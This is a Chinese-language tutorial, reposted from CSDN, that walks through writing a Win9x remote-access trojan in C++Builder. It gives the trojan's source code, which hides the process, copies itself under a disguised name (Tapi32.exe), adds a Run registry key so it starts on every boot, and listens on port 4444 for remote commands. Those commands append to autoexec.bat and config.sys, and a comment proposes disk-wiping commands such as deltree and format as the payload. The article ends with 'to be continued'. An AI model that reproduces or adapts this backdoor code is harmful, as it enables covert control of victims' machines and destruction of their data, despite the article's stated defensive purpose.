木馬是如何編寫的

特洛依木馬這個名詞大家應該不陌生，自從98年“死牛崇拜”黑客小組公佈Back Orifice以來，木馬猶如平地上的驚雷，使在Dos——Windows時代中長大的中國網民從五彩繽紛的網絡之夢中驚醒，終於認識到的網絡也有它邪惡的一面，一時間人心惶惶。

　　我那時在《電腦報》上看到一篇文章，大意是一個菜鳥被人用BO控制了，嚇得整天吃不下飯、睡不着覺、上不了網，到處求救！呵呵，要知道，木馬（Trojan）的歷史是很悠久的：早在AT&T Unix和BSD Unix十分盛行的年代，木馬是由一些玩程式（主要是C）水平很高的年輕人（主要是老美）用C或Shell語言編寫的，基本是用來竊取登陸主機的口令，以取得更高的權限。那時木馬的主要方法是誘騙——先修改你的.profile文件，植入木馬；當你登陸時將你敲入的口令字符存入一個文件，用Email的形式發到攻擊者的郵箱裏。國內的年輕人大都是在盜版Dos的薰陶下長大的，對網絡可以說很陌生。直到Win9x橫空出世，尤其是WinNt的普及，大大推動了網絡事業的發展的時候，BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬（甚至在Win9x的“關閉程序”對話框可以看到進程）給了當時中國人極大的震撼，它在中國的網絡安全方面可以說是一個劃時代的軟件。

　　自己編寫木馬，聽起來很Cool是不是？！木馬一定是由兩部分組成——服務器程序（Server）和客戶端程序（Client），服務器負責打開攻擊的道路，就像一個內奸特務；客戶端負責攻擊目標，兩者需要一定的網絡協議來進行通訊（一般是TCP/IP協議）。爲了讓大家更好的瞭解木馬攻擊技術，破除木馬的神祕感，我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬，使大家能更好地防範和查殺各種已知和未知的木馬。

　　首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi，這裏我們選用C++Builder（以下簡稱BCB）；VC雖然好，但GUI設計太複雜，爲了更好地突出我的例子，集中注意力在木馬的基本原理上，我們選用可視化的BCB；Delphi也不錯，但缺陷是不能繼承已有的資源（如“死牛崇拜”黑客小組公佈的BO2000源代碼，是VC編寫的，網上俯拾皆是）；VB嘛，談都不談——難道你還給受害者傳一個1兆多的動態鏈接庫——Msvbvm60.dll嗎？

　　啓動C++Builder 5.0企業版，新建一個工程，添加三個VCL控件：一個是Internet頁中的Server Socket，另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個服務器程序，可以對外服務（對攻擊者敞開大門）。Socket最初是在Unix上出現的，後來微軟將它引入了Windows中（包括Win98和WinNt）；後兩個控件的作用是用來使程序具有FTP（File Transfer Protocol文件傳輸協議）和SMTP（Simple Mail Transfer Protocol簡單郵件傳輸協議）功能，大家一看都知道是使軟件具有上傳下載功能和發郵件功能的控件。

　　Form窗體是可視的，這當然是不可思議的。不光佔去了大量的空間（光一個Form就有300K之大），而且使軟件可見，根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form，就像Delphi用過程實現的小程序一般只有17K左右那樣。

　　我們首先應該讓我們的程序能夠隱身。雙擊Form，首先在FormCreate事件中添加可使木馬在Win9x的“關閉程序”對話框中隱藏的代碼。這看起來很神祕，其實說穿了不過是一種被稱之爲Service的後臺進程,它可以運行在較高的優先級下,可以說是非常靠近系統核心的設備驅動程序中的那一種。因此，只要將我們的程序在進程數據庫中用RegisterServiceProcess()函數註冊成服務進程（Service Process）就可以了。不過該函數的聲明在Borland預先打包的頭文件中沒有，那麼我們只好自己來聲明這個位於KERNEL32.DLL中的鳥函數了。首先判斷目標機的操作系統是Win9x還是WinNt：

{
DWORD dwVersion = GetVersion();
// 得到操作系統的版本號
if (dwVersion >= 0x80000000)
// 操作系統是Win9x，不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
file://定/義RegisterServiceProcess()函數的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
file://加/載RegisterServiceProcess()函數所在的動態鏈接庫KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
file://得/到RegisterServiceProcess()函數的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
file://執/行RegisterServiceProcess()函數,隱藏本進程
FreeLibrary(hDLL);
file://卸/載動態鏈接庫
}
}

　　這樣就終於可以隱身了（害我敲了這麼多代碼！）。爲什麼要判斷操作系統呢？因爲WinNt中的進程管理器可以對當前進程一覽無餘，因此沒必要在WinNt下也使用以上代碼（不過你可以使用其他的方法，這個留到後面再講）。接着再將自己拷貝一份到%System%目錄下，例如：

C:/Windows/System，並修改註冊表，以便啓動時自動加載：

{
char TempPath[MAX_PATH];
file://定/義一個變量
GetSystemDirectory(TempPath ,MAX_PATH);
file://TempPath/是system目錄緩衝區的地址,MAX_PATH是緩衝區的大小，得到目標機的System目錄路徑
SystemPath=AnsiString(TempPath);
file://格/式化TempPath字符串，使之成爲能供編譯器使用的樣式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"//Tapi32.exe").c_str() ,FALSE);
file://將/自己拷貝到%System%目錄下，並改名爲Tapi32.exe，僞裝起來
Registry=new TRegistry;
file://定/義一個TRegistry對象，準備修改註冊表，這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
file://設/置主鍵爲HKEY_LOCAL_MACHINE
Registry->OpenKey("Software//Microsoft//Windows//CurrentVersion//Run",TRUE);
file://打/開鍵值Software//Microsoft//Windows//CurrentVersion//Run，如果不存在，就創建之
try
{
file://如/果以下語句發生異常，跳至catch，以避免程序崩潰
if(Registry->ReadString("crossbow")!=SystemPath+"//Tapi32.exe")
Registry->WriteString("crossbow",SystemPath+"//Tapi32.exe");
file://查/找是否有“crossbow”字樣的鍵值，並且是否爲拷貝的目錄%System%+Tapi32.exe
file://如/果不是，就寫入以上鍵值和內容
}
catch(...)
{
file://如/果有錯誤，什麼也不做
}
}

　　好，FormCreate過程完成了，這樣每次啓動都可以自動加載Tapi32.exe，並且在“關閉程序”對話框中看不見本進程了，木馬的雛形初現。
接着選中ServerSocket控件，在左邊的Object Inspector中將Active改爲true，這樣程序一啓動就打開特定端口，處於服務器工作狀態。再將Port填入4444，這是木馬的端口號，當然你也可以用別的。但是你要注意不要用1024以下的低端端口，因爲這樣不但可能會與基本網絡協議使用的端口相沖突，而且很容易被發覺，因此儘量使用1024以上的高端端口（不過也有這樣一種技術，它故意使用特定端口，因爲如果引起衝突，Windows也不會報錯 ^_^）。你可以看一看TNMFTP控件使用的端口，是21號端口，這是FTP協議的專用控制端口（FTP Control Port）；同理TNMSMTP的25號端口也是SMTP協議的專用端口。

　　再選中ServerSocket控件，點擊Events頁，雙擊OnClientRead事件，敲入以下代碼：

{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
file://定/義了一堆待會兒要用到的變量
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("//Win369.BAT")).c_str());
file://在%System%下/建立一個文本文件Win369.bat，作爲臨時文件使用
AnsiString temp=Socket->ReceiveText();
file://接/收客戶端（攻擊者，也就是你自己）傳來的數據
}

　　好，大門敞開了！接着就是修改目標機的各種配置了！^_^ 首先我們來修改Autoexec.bat和Config.sys吧：

{
if(temp.SubString(0,9)=="edit conf")
file://如/果接受到的字符串的前9個字符是“edit conf”
{
int number=temp.Length();
file://得/到字符串的長度
int file_name=atoi((temp.SubString(11,1)).c_str());
file://將/第11個字符轉換成integer型，存入file_name變量
file://爲/什麼要取第11個字符，因爲第10個字符是空格字符
content=(temp.SubString(12,number-11)+'/n').c_str();
file://餘/下的字符串將被作爲寫入的內容寫入目標文件
FILE *fp=NULL;
char filename[20];
chmod("c://autoexec.bat",S_IREAD|S_IWRITE);
chmod("c://config.sys",S_IREAD|S_IWRITE);
file://將/兩個目標文件的屬性改爲可讀可寫
if(file_name==1)
sprintf(filename,"%s","c://autoexec.bat");
file://如/果第11個字符是1,就把Autoexec.bat格式化
else if(file_name==2)
sprintf(filename,"%s","c://config.sys");
file://如/果第11個字符是1,就把Config.sys格式化
times_of_try=0;
file://定/義計數器
while(fp==NULL)
{
file://如/果指針是空
fp=fopen(filename,"a+");
file://如/果文件不存在，創建之；如果存在，準備在其後添加
file://如/果出錯，文件指針爲空，這樣就會重複
times_of_try=times_of_try+1;
file://計/數器加1
if(times_of_try>100)
{
file://如/果已經試了100次了，仍未成功
Socket->SendText("Fail By Open File");
file://就/發回“Fail By Open File”的錯誤信息
goto END;
file://跳/至END處
}
}
fwrite(content,sizeof(char),strlen(content),fp);
file://寫/入添加的語句，例如deltree/y C:或者format/q/autotest C:，夠毒吧？！
fclose(fp);
file://寫/完後關閉目標文件
Socket->SendText("Sucess");
file://然/後發回“Success”的成功信息
}
}

　　你現在可以通過網絡來察看目標機上的這兩個文件了，並且還可以向裏面隨意添加任何命令。呵呵，這只不過是牛刀小試罷了。朋友，別走開！（未完待續）

本文轉載自中國軟件（http://www.csdn.net）。